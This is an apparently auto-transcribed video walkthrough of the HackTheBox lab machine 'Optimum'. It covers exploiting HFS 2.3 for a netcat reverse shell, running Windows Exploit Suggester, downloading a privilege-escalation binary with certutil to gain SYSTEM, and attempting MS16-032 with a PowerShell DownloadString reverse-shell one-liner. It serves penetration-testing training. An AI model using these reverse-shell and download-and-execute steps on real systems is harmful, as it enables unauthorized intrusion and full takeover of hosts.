Here we are and welcome back. In today's video, we're gonna tackle down another machine from HackTheBox. The machine name is Optimum. It is Windows Server 2012. The difficulty ranges from easy to medium. I would say it is medium. We're gonna approach the solution or the penetration testing using different approaches. We're not gonna stick to one way to provide the solution, right? We always try to solve the machines or the challenges different ways. So let's get started. Okay. So here you have the Nmap scan. The Nmap scan shows me I have only port 80 open, and I have a web server, file sharing server running on this IP. So if we can go to the web browser, open web browser to examine the file sharing server, the first thing we do all the time, we examine the software we are testing. I forgot something. I forgot to add it to the host file. So sudo nano etc hosts. Right. Here we add one entry for 10, 10, 10. And we put the name of this thing. Okay. Right. Navigate. So here we have the web page of the file sharing server. Users can log in, upload files, download files, share between each other. It's much like Dropbox, if you know Dropbox, or if you know Google Drive. It's the same concept to share files between people, right? To control who can access, who can't access, what they can access, what they can't access. So it's a file sharing server, but I think it is lower class than Google Drive or Dropbox or the other solutions. Right, so here we know we are familiar with the application we are testing. Now the next step is to find an exploit. So first, before finding an exploit, we need to understand how this works. We know how this works. Now, what do we do here? We can't register an account. If we were able to register, we would have been able to upload a reverse shell if there is no input sanitization on the back end. That's one thing. Now the next thing, since we can't have any entry, right? And the next thing is to try to find a loophole or weakness through the version. If it is not up to date, right, we can find an exploit. So the server info here is very important for the exploitation. We have HTTP file server 2.3. So we'll try to look for an exploit. So we use a new tab. This one, two, okay. So sudo search exploit-w HFS. Let's go back. We have 2.3. Let's see if there is a matching one for this version. Okay, so as you can see, we have 2.3. We have 3 exploits we can use. Now, if you get an explanation for the exploits like that, so the one that we will use, we have 2 remote code execution. We have 1.txt and we have the 1.py. Right, so here what we can do, we can get an explanation for every one of them. Exploits, and we put the path. Okay, so we have here the exploit explanation. So localhost 80 search execute, see we put the command. Okay, that's one. Now the second one is 39 9161. Now this one, what does it do? So here, the description, you can use HFS to send and receive files, right? Okay. This is the usage Python exploit.py. We put the target, which is Optimum, and we put the target port number. In our case, it is 80. We need to be using a web server hosting Netcat. You may need to run it multiple times for success. Okay, let's take the risk. Then we're gonna need to download this, so we can use -m. Okay, so now it is in my directory here, and this is the exploit. Right, so let's sudo nano and see what we need to change. So, okay, so here it goes our IP. Since it's gonna connect back to us, we need to change the IP to our IP. So our IP is the part that sucks all the time. So if config, change it every time. No, it doesn't change. 14, 16, 10, 10, 14, 16. And the local port 443, it is okay, but I don't like using ports lower than 124 for these kind of purposes. But okay, we can stick to that for this time. 443. Save. Okay. Now we're gonna need to split the view into 3 views. Now this is the first one. The second one will be like that. All right. So here we need, all right. So in one way here, in one view, we need to launch a web server and put the netcat here. And in the view here, we need to, launch the netcat listener in order to receive the connection back that exploit will send. So now in here, we need to move netcat. So we're going to move netcat to this directory. So to do that, we're going to copy the netcat from Windows directory at our local machine. Make sure it is in the Windows binaries, because we will use netcat on the Windows target, not Linux. So here we're going to sudo cp user share Windows binaries, and then sc.exe. Move that to home. Okay, so we have the netcat here. Now we're going to launch the Python server. Nope. Right. Okay. Now, on the right window, we need netcat listening on the incoming traffic. So, nc-lvp 443. This is the port that we can have configured in the exploit. Can't grab, bind. Oh, I told you. The permissions. Okay. So right now we are listening. The next thing is to launch the exploit. So according to the instructions of the exploit, we need to launch the exploit like this. Sudo, the name of the exploit, one, Python, right? And now the target IP, which is going to be, let's try with the host name and the port. The port is the port of the target, the port where the web server is running, which is 80. Run this another time. It didn't work because it was trying to pull Netcat from my server on port 80, not 8000. So let me modify this on the exploit. So sudo nano 39. Let's see where is the part at which it connects to my machine to pull Netcat. I will modify this part. So you don't forget to change the local IP address and port number. I want to find the part. Right, so here, as you can see, Netcat run, it pulls this from sysargs. Right, okay. So I need to run this on port, the web server needs to be run on port 80. So we will copy that to the var html sudo cp nc.exe to var html and sudo run the Apache server in this case. Okay, let's test this out. So we go to localhost and see. Right, so now it is working. Now let's relaunch the exploit and check if it works. Okay, let me try with the IP address instead. 10, 10, 10, 8. Right, so on the left, as you can see here, on the right, sorry, we got access to the Windows system. As you can see, this is the command prompt of the Windows system. And now we are the user Kostas. Kostas. By the way, Kostas is a furniture brand in Turkey. The name is Kostas. Okay. Right, so now let's see. The first thing we need to do, guys, is to escalate our privileges. Right, we are Kostas, we want to be admin. We want unlimited access. So here, first try to understand what we can do on the system. So we take it from there. So homi -priv. So this user seems to have very limited access, very limited space to move within. So see change, notify privilege, see increase working set privilege. I'm going to close this instance. We don't need this anymore, and I don't need this anymore. Okay. Right now, we have a multitude of options. We can do whatever we want. We can transfer Empire PowerShell to suggest for exploits. We can try using WinPeace, Empire to suggest a possible exploits to escalate our privileges. But here we will use another tool. It's called Windows Exploit Suggester. Okay, we will try to exploit this machine using different exploits. So first, we need to download this because I don't have it. Windows Exploit Suggester. There is one. There is exact. I mean, there is one tool exactly the same purpose, but it's for Linux. It's called Linux Exploit Suggester. Right. So you copy that and you go back. Now here we're gonna open a new tab, light dark, git dark. Sudo git clone. Download that. Right. Clear. And we have this here. Let's cd to that directory. So right now the exploit is here. Now, all we have to do is to run this from our local machine. But how to feed all of the system details to that exploit? We need to go back to the reverse shell. This is the access we have on the remote host. And we need to run sysinfo system info. Right. So now we have all of the system info. The OS name is Microsoft Windows Server 2012 R2 standard. The build version is 6.3 Microsoft, and it is running on VMware. BIOS version. Yes, so for us, the pen testers, the relevant details is the version. So it is the build number is important and the year of release, 2012, which is most likely vulnerable, right? Everything before 2016, I guess. No, even 2020. Even 2020 releases have vulnerabilities. So what if it was 2012? Of course, it would have vulnerabilities. So 2012, this is the version number. Now all we have to do is to feed these info to the Windows exploit suggester. Okay. So what we will do now, we will grab all of this from here, go down, stop here, copy that, and you go back to your local machine, create a new file called sysinfo.txt, which will hold your target system information. Okay. Now, in order to run this tool, we need also to feed the database on which the tool will rely. What do I mean by this? The tool will look for missing patches, missing updates on the Windows host, right? If there is any missing update, it will try to look for it. That's why it needs a list of updates, right, to see if the operating system is missing one of them. Okay, so I think we need to update this tool before we run it, since the databases are missing. So we're going to run sudo python and then Windows. Why it's not auto-completing? This thing irritates me too much. Why? Because sometimes one uppercase letter messes up your auto-completion. So Python Windows, okay, -- updates. All right, writing to file. So here's your database file. Now, the next thing is to run the tool to check if the remote host or our target, which is here, right, is missing one or more of the updates or patches in this file. So sudo python windows -- system info is specified in the sysinfo file, and then the database -- database is specified as well. So we run this and we check. Okay, so all of these are vulnerabilities, right? Now, of course, we can try one by one, but the one that worked, they are, I checked for, let me start from here. Let's go up. So 35, 39. This one, as you can see, Microsoft 8.1, although it is for 8.1, but it also worked on Windows Server 2012. So we can use this exploit as well. So we can copy this URL, grab it, copy link, and we go back, browser, we enter this. So this is the exploit page. Now we can also use another exploit, which is, let's go back. This also works, WebDAV, to address elevation of privilege. We can also use this one. Let's go down. Let's go back up. So we can use this one, and we will also use, let's see, this works on, we can also use this one, security updates. It is used for elevation of privileges. So we will use this one, the 98, and we can use 32, right? So we will first exploit the system with 98 and then disconnect back to low privilege to use that exploit. We're going to explain these two in details. Okay, let's use first the first one, which is the easiest. All you have to do is to just download it. Okay, now let's go back, cd back. We see it is here. Let's first open it. Okay, so it is saying that there is a binary or there is a compiled version for this exploit. We can download this directly, I guess. Okay, pretty good. So copy that, go browser. So we have the exe file here. Let's rename it. So the mv410 to temp. I like this name. Okay, sudo mv temp to okay. All you have to do now is to download this and run it on your target. So let's go to desktop. Okay, so we have it here. Launch your Python server. Of course, let's put 3 here and put sudo. Okay, now on the remote host or on your target Windows here, you have to download this. And we are in the desktop directory. It is very wise to check first if you have write access, meaning that if you can put files on the directory to which you will download the exploit. So we can, for example, see what we have here. So we have hfs user.txt. Let's try reading this file. Okay, good. So I guess we can download files here. So cert util. Wait, do we have this here? We have it. Cert util -url cache -f 10 10 10 no 14 16. So the file is being pulled from our machine. Great. Now all you have to do is to run it, and I hope it's gonna work. Now, how do we know if it worked? Who am I? /user, and you are the owner of the system. Congratulations. Now all you have to do is to read the flag, leave this to you. Okay, now the other way around. The other way around is to use the other exploit, which is a bit harder. The implementation is a bit, I mean, it is dirtier, right? So this is the exploit. Okay. So in order to use that exploit, we can use PowerShell Empire. If you don't have it, just download it. So for PowerShell, in PowerShell Empire, let me go back to my local machine. The PowerShell Empire, if you go to Empire and navigate directly to data, module source, prev-esc for privilege escalation. You see we have a module here, or a privilege escalation script specified dedicated for 16032, which is great. We're going to use that. But before using this, we need a couple of stuff to be done. First thing is we have to create a reverse shell one-liner and add it to the end of this file. Let's open it. Okay. So at the end of this file, let's go down. Here, right here, we will add the following. So, my mouse. Okay. So invoke ms 16032, and then we specify the command. I'll explain what this does. New object for the client, and we close this. That's right, I guess. Now download string 10, 10, 14, 16, 8000. Listen shell ps1. Okay, so what this do, guys? This will actually this script, right? The PowerShell script will exploit the vulnerability in Windows PowerShell, Windows Server 2012, and after the exploitation, it will download this script from my machine, which is a PowerShell one-liner reverse shell, and gives me session back to my machine. That's what it means here, right? It exploits and then downloads the reverse shell, right? It is very necessary we type this in order to receive the connection back. So, okay, now we save this. Oop, permission denied. How silly is this? This is very silly. Let me save it in desktop and change the name to config. Okay. Now let me go back. The config is here. Okay. Right, so everything is correct. So we download this to the remote host, the target, okay, and we launch it. Okay, before launch this, we need the PowerShell reverse shell to be running. So we will end the web server here, and we will grab the PowerShell reverse shell from GitHub, which is here in Nishang. You can download this from here. Okay. Sudo nano, and here we put what was the name of the file? Listen shell ps1. Paste that here, and at the end of the line, this is the shell, the script that will give us back the connection. So here we need to type invoke PowerShell TCP -reverse -IP. Here you put your IP address and dashboard. My favorite port 4545. And you finish. So if you open this again with my lovely mousepad, okay, great. So how it's gonna work? Remember this one? Let me open it. Some people like to everything to be given in a spoon. Okay, so here, I guess. All right. So this one, the config script, PowerShell script, will exploit the vulnerability, right? After the exploitation, it will pull from my machine this script, okay? Listen shell.ps1. And listen shell, once it is downloaded, it will launch reverse shell back to my machine. That's how the privilege escalation will work. I hope this is clear. Okay, we close that and we close this one. Now all we have to do is we go to the target machine. Now we are here Costas. I think I need to terminate the shell again. So I'm going to terminate the connection. Split again to the right. So here we do the same process, the exploitation from scratch. Sudo etc init and we launch Netcat again on port 443. And now here we go to home. Where is the exploit? Where are you? Where? Was somewhere here? No? I think it is in downloads. I wonder where was the exploit that we used to get the reverse shell. Obviously, it is somewhere we forgot. Let me go back here, check again. py. There is no py file here. Right, it could be in the home directory. So it is here. Okay, so let's launch this again. 39. Okay, the target 8 port 80. Great. Now, here we are again in the remote target. Okay, now we need to download the two scripts here, the same mechanism I explained. To do that, we first need to switch to PowerShell. So, PowerShell, great. No? Okay. So here we need to download the script. So we launch invoke expression and then new object. I don't know how sometimes some letters are missed from my keystrokes. Okay, dot and download string. And we specify the machine, which is our machine, 10, 10, 14, 16. All right, so the one that we will download is this one, config. Config ps1. I may check again on that. Okay, that's correct. Before running or hitting enter, we go back and we launch the Python's listener. and you enter. Standing still, but it is not being retrieved from my machine. Maybe we need to wait more. Oh, we have something wrong here. It is the listener, nc-lvp tobacco 5. Now, we have a problem. Oh, it's very boring sometimes. Starting over. Okay, again. PowerShell ix invoke expression new objects. Do it. Okay. It has been pulled. Now, oh, we have an error. The term invoke MS16 that is not recognized as the name of a CMDLet. So here, let me go back. This one. So it doesn't recognize it as an expression. 62.0.32 invoke dash command ix. Well, what could be the reason for this? All right, so I tried too many times to make the PowerShell method work, but it didn't work. As you can see, whenever I switch to PowerShell, on the remote host, just the PowerShell prompt doesn't respond to anything. ls doesn't respond to anything, let alone the downloading and executing the script. So for me, the PowerShell method didn't work just because of this ridiculous thing. The one that worked for me is the exploit that we downloaded, temp.exe, and we got the system method. Now, as far as the PowerShell method is concerned, just try it on your own, right? Use the invoke and use the listen shell and see if it's going to work for you. So that was it for today. Cheers. See you in the next video.